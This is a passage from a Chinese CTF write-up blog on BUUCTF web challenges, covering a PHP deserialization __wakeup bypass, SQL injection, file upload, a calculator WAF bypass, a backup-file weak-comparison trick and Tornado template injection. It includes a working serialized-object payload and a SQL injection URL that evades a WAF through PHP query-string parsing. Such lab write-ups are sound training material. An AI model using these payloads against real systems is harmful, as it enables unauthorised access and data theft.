在不想执行 __wakeup() 的时候，可以让序列化结果中类属性的数值大于其真正的数值进行绕过，这个方式适用于PHP < 5.6.25 和 PHP< 7.0.10。

那这里把2改成3

最后的payload如下：

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">/?select=O:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;Name&quot;</span>:<span class="hljs-number">3</span>:&#123;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;%00Nameusername&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;admin&quot;</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;Namepassword&quot;</span>;i:<span class="hljs-number">100</span>;&#125;<br></code></pre></td></tr></table></figure>

参考链接：

https://zhuanlan.zhihu.com/p/366455343

https://blog.csdn.net/qq_45927266/article/details/120380343

# [极客大挑战 2019]BabySQL

![image-20220313163626724](buu1-web/image-20220313163626724.png)

![image-20220313164052931](buu1-web/image-20220313164052931.png)

![image-20220313164506955](buu1-web/image-20220313164506955.png)

![image-20220313165039532](buu1-web/image-20220313165039532.png)

![image-20220313165116686](buu1-web/image-20220313165116686.png)

![image-20220313165301926](buu1-web/image-20220313165301926.png)

# [ACTF2020 新生赛]Upload

![image-20220314180239742](buu1-web/image-20220314180239742.png)

上传一张图片以后，可以得到存储目录以及上传后的图片名字

/uplo4d 不让直接访问，但是这不是很影响

![image-20220314182257027](buu1-web/image-20220314182257027.png)

![image-20220314192724307](buu1-web/image-20220314192724307.png)

~~少了个？，小声~~

![image-20220314193050215](buu1-web/image-20220314193050215.png)

![image-20220314193255727](buu1-web/image-20220314193255727.png)

又到了传马，cat /flag的环节,没了

# [RoarCTF 2019]Easy Calc

![image-20220321213019871](buu1-web/image-20220321213019871.png)

习惯f12，发现有waf，过waf的话需要危险传参

![image-20220321213341965](buu1-web/image-20220321213341965.png)

calc.php引起注意，打开看看

![image-20220321213551464](buu1-web/image-20220321213551464.png)

有点东西，过滤了一堆字符，参数是num，第一个就是过滤空格，那这里可以通过 num（就是num前面加一个空格完成传参，由于/ ，''被过滤了这里可以通过chr(47)进行绕过

![image-20220321215049946](buu1-web/image-20220321215049946.png)

补充：var_dump() :打印变量的相关信息      scandir()：列出文件目录，访问f1agg

![image-20220321221751130](buu1-web/image-20220321221751130.png)

file_get_contents()读取文件内容

PHP的字符串解析特性
这是别人对PHP字符串解析漏洞的理解，
我们知道PHP将查询字符串（在URL或正文中）转换为内部$_GET或的关联数组$_POST。例如：/?foo=bar变成Array([foo] => “bar”)。值得注意的是，查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如，/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截，那么我们就可以用以下语句绕过：

/news.php?%20news[id%00=42"+AND+1=0–

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事：

1.删除空白符

2.将某些字符转换为下划线（包括空格）

参考链接：https://blog.csdn.net/weixin_44077544/article/details/102630714

# [ACTF2020 新生赛]BackupFile

扫一扫得到备份文件

![image-20220327215523579](buu1-web/image-20220327215523579.png)

![image-20220327215553139](buu1-web/image-20220327215553139.png)

php弱比较，传参key=123即可绕过

# [护网杯 2018]easy_tornado

让我康康有什么

![image-20220328210600168](buu1-web/image-20220328210600168.png)

![image-20220328210620835](buu1-web/image-20220328210620835.png)

![image-20220328210635443](buu1-web/image-20220328210635443.png)

知道了flag在哪里，提示了cookie_secret,render,那就查一下，render（)可以对服务器端渲染，*render*方法的实质就是生成template模板这里是考的是模板注入（ssti），因为[render](https://so.csdn.net/so/search?q=render&spm=1001.2101.3001.7020)（）是tornado里的函数，[Tornado](https://so.csdn.net/so/search?q=Tornado&spm=1001.2101.3001.7020)框架的附属文件handler.settings中存在cookie_secret，

测试注入点

![image-20220328213049326](buu1-web/image-20220328213049326.png)

![image-20220328213510476](buu1-web/image-20220328213510476.png)

从报错页面进行注入

![image-20220328214852638](buu1-web/image-20220328214852638.png)

![image-20220328214949353](buu1-web/image-20220328214949353.png)

![image-20220328220413072](buu1-web/image-20220328220413072.png)

![image-20220328220339212](buu1-web/image-20220328220339212.png)

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>Almond</li>
    <li><strong>本文链接：</strong><a href="http://example.com/2022/01/13/buu1-web/index.html" title="http:&#x2F;&#x2F;example.com&#x2F;2022&#x2F;01&#x2F;13&#x2F;buu1-web&#x2F;index.html">http:&#x2F;&#x2F;example.com&#x2F;2022&#x2F;01&#x2F;13&#x2F;buu1-web&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a></li></ul> 

        
  <nav class="nav">
    <a href="/2022/01/22/hgame-week1/"><i class="iconfont iconleft"></i>hgame-week1</a>
    <a href="/2021/11/02/%E4%B8%9C%E5%8D%8E%E6%9D%AF%E5%A4%8D%E7%8E%B0/">东华杯复现<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-EasySQL"><span class="toc-text">[极客大挑战 2019]EasySQL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HCTF-2018-WarmUp"><span class="toc-text">[HCTF 2018]WarmUp</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Havefun"><span class="toc-text">[极客大挑战 2019]Havefun</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Include"><span class="toc-text">[ACTF2020 新生赛]Include</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="toc-text">[强网杯 2019]随便注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9Ahandler%E6%9F%A5%E8%AF%A2"><span class="toc-text">方法一：handler查询</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Ehandler"><span class="toc-text">关于handler</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A%E9%87%8D%E5%91%BD%E5%90%8D"><span class="toc-text">方法二：重命名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%89%EF%BC%9A%E9%A2%84%E5%A4%84%E7%90%86%E8%AF%AD%E5%8F%A5"><span class="toc-text">方法三：预处理语句</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E9%A2%84%E5%A4%84%E7%90%86%E8%AF%AD%E5%8F%A5"><span class="toc-text">关于预处理语句</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E5%9B%9B%EF%BC%9A%E8%B0%81%E4%BC%9A%E6%83%B3%E5%88%B0%E8%BF%99%E9%A2%98%E5%8F%AF%E4%BB%A5%E5%86%99%E4%B8%AAshell%E5%91%A2"><span class="toc-text">方法四：谁会想到这题可以写个shell呢</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SUCTF-2019-EasySQL"><span class="toc-text">[SUCTF 2019]EasySQL</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-text">方法一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-text">方法二</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Exec"><span class="toc-text">[ACTF2020 新生赛]Exec</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%89%E4%BD%8D%E6%88%96"><span class="toc-text">|按位或</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%BB%E8%BE%91%E6%88%96"><span class="toc-text">||逻辑或</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#amp-%E6%8C%89%E4%BD%8D%E4%B8%8E"><span class="toc-text">&amp;按位与</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#amp-amp-%E9%80%BB%E8%BE%91%E4%B8%8E"><span class="toc-text">&amp;&amp;逻辑与</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%EF%BC%9B%EF%BC%88linux%E4%B8%AD%E4%B8%8E-amp-%E5%8A%9F%E8%83%BD%E7%9B%B8%E5%90%8C%EF%BC%89"><span class="toc-text">；（linux中与&amp;功能相同）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Secret-File"><span class="toc-text">[极客大挑战 2019]Secret File</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL"><span class="toc-text">[极客大挑战 2019]LoveSQL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#GXYCTF2019-Ping-Ping-Ping"><span class="toc-text">[GXYCTF2019]Ping Ping Ping</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-text">绕过方法一</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-text">绕过方法二</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Http"><span class="toc-text">[极客大挑战 2019]Http</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Knife"><span class="toc-text">[极客大挑战 2019]Knife</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BuyFlag"><span class="toc-text">[极客大挑战 2019]BuyFlag</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%9A%E7%A7%91%E5%AD%A6%E8%AE%B0%E6%95%B0%E6%B3%95"><span class="toc-text">方法一：科学记数法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%9A%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87"><span class="toc-text">方法二：数组绕过</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Upload"><span class="toc-text">[极客大挑战 2019]Upload</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=695134722 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#556B2F'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="https://github.com/Almondcloud "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#556B2F'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:695134722@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#5F9EA0" 
        onMouseOut="this.style.color='#556B2F'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>© 2021 Almond | Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
    <div class="search">
  <div class="search-container">
    <div class="search-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <div class="search-input-wrapper">
      <i class="search-input-icon iconfont iconsearch"></i>
      <input class="search-input" type="search" id="search-input" placeholder="Search..." autofocus autocomplete="off"
        autocorrect="off" autocapitalize="off">
    </div>
    <div class="search-output" id="search-output"></div>
  </div>
</div>
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>








<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>